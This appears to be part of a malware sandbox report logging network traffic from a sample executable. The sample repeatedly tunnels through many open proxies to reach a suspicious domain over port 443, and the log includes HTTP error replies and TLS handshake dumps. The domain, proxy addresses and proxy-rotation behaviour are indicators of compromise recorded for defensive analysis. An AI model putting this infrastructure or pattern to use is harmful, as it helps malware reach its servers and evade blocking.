                                                                                                      Feb 23, 2024 09:45:20.227669001 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.597534895 CET311INHTTP/1.1 400 Bad Request
                                                                                                      Server: nginx
                                                                                                      Date: Fri, 23 Feb 2024 08:45:20 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 166
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      370192.168.2.450914203.95.199.15980806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.231286049 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      371192.168.2.451085104.16.105.15806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.267190933 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.355189085 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:20 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      372192.168.2.451081185.162.229.112806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.267257929 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.355020046 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:20 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      373192.168.2.45091927.65.116.24310806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.270750046 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      374192.168.2.451009212.110.188.202344096812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.272567987 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.865602970 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.475004911 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.680668116 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:24.865768909 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.940140009 CET39INHTTP/1.1 200 Connection established


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      375192.168.2.451099104.20.24.214806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.277363062 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.370145082 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:20 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      376192.168.2.450927102.132.57.9380806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.282569885 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      377192.168.2.451015195.90.216.7510806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.283404112 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      378192.168.2.451127104.18.143.26806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.292433977 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.380131006 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:20 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      379192.168.2.45106012.186.205.122806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.294063091 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.421061039 CET325INHTTP/1.1 400 Bad Request
                                                                                                      Server: nginx/1.14.1
                                                                                                      Date: Fri, 23 Feb 2024 08:45:20 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 173
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.1</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      380192.168.2.45101291.189.177.18831286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.299958944 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.809770107 CET1286INHTTP/1.1 403 Forbidden
                                                                                                      Server: squid/5.7
                                                                                                      Mime-Version: 1.0
                                                                                                      Date: Fri, 23 Feb 2024 08:45:21 GMT
                                                                                                      Content-Type: text/html;charset=utf-8
                                                                                                      Content-Length: 3532
                                                                                                      X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                                      Vary: Accept-Language
                                                                                                      Content-Language: en
                                                                                                      X-Cache: MISS from lb1
                                                                                                      X-Cache-Lookup: NONE from lb1:3128
                                                                                                      Via: 1.1 lb1 (squid/5.7)
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64
                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2020 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      381192.168.2.451146172.67.182.60806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.310410976 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.397434950 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:20 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      382192.168.2.451040161.97.173.42533976812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.313143969 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.902682066 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.443968058 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.443937063 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:24.464728117 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.444102049 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      383192.168.2.45113954.152.3.36806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.314172029 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.433587074 CET178INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 23 Feb 2024 08:45:20 GMT
                                                                                                      Content-Type: text/plain
                                                                                                      X-Powered-By: PHP/5.3.6-13ubuntu3.6
                                                                                                      Server: ibm internet connection server
                                                                                                      Content-Length: 0
                                                                                                      Feb 23, 2024 09:45:20.433964968 CET394OUTData Raw: 16 03 03 01 85 01 00 01 81 03 03 65 d8 5b 20 eb db 4f a7 7b 31 05 5c 4a b6 3c 46 62 e2 51 d7 62 8a 5a dc d3 86 52 86 33 92 0d 2e 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                                      Data Ascii: e[ O{1\J<FbQbZR3.*,+0/$#('=<5/.-+(heygirlisheeverythingyouwantedinaman.com#j</7Il2)oo JCSsyn'9L}xhl
                                                                                                      Feb 23, 2024 09:45:20.534873009 CET536INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 19 8f ee 1a 93 fd 84 4c e7 a2 23 e6 b2 ec 9e ed 98 85 3e ec 2f 06 8d 25 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 e8 0b 00 02 e4 00 02 e1 00 02 de 30
                                                                                                      Data Ascii: =9L#>/%DOWNGRD0000*H03110/U(heygirlisheeverythingyouwantedinaman.com0240223083916Z260222083916Z03110/U(heygirlisheeverythingyouwantedinaman.c
                                                                                                      Feb 23, 2024 09:45:20.534970045 CET536INData Raw: 01 00 01 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 03 82 01 01 00 02 35 24 1c b6 5b 43 aa 90 2c 63 00 e9 cd 98 b3 ac 19 41 3c d4 e2 34 bd df fa d1 b2 84 bb 2b 8e 92 83 60 77 61 49 06 6d c0 36 e7 c7 98 27 fa f9 86 9d e0 82 2a ba b0 15 ba 82 ed
                                                                                                      Data Ascii: 0*H5$[C,cA<4+`waIm6'*8q~+]%Qt%<Z0<|]Ziv%(e:_)9vs%DQ:#w"}ZGVe<Qxe2BYJH?F&
                                                                                                      Feb 23, 2024 09:45:20.534985065 CET57INData Raw: 11 9d 09 ae 62 66 d5 26 e1 7b 39 27 b5 37 60 fa be 98 69 7e cf 10 ca 45 6f 0c 0d e7 b0 7e 9f ec 0c eb 2d fa cf 8d a1 cc 20 c8 90 65 29 e7 6b 0f 16 03 03 00 04 0e 00 00 00
                                                                                                      Data Ascii: bf&{9'7`i~Eo~- e)k
                                                                                                      Feb 23, 2024 09:45:20.544588089 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 1b ea 97 96 55 89 d7 a3 01 fa 39 75 7f 8d d5 44 83 ef 27 db 8d 9f 1b 1a 48 dd 73 30 e9 49 2a 38 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 b5 27 9a 00 a0 63 82 40 39 54 29 35 3a 7a b5 3e 67 65 e9 f6 dc
                                                                                                      Data Ascii: %! U9uD'Hs0I*8('c@9T)5:z>ge7}k[W*P
                                                                                                      Feb 23, 2024 09:45:20.638890982 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 db b3 ca 1a 67 28 ed fa 5d 78 1a 90 9b 05 50 d8 1c a5 69 dc f1 e0 e4 d5 79 aa dd 03 ca 38 7b 21 2a 3e 1b a1 13 7f 11 23
                                                                                                      Data Ascii: (g(]xPiy8{!*>#


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      384192.168.2.451152172.67.182.3806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.316972971 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.404932022 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:20 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      385192.168.2.451187104.24.15.158806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.336139917 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.423845053 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:20 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
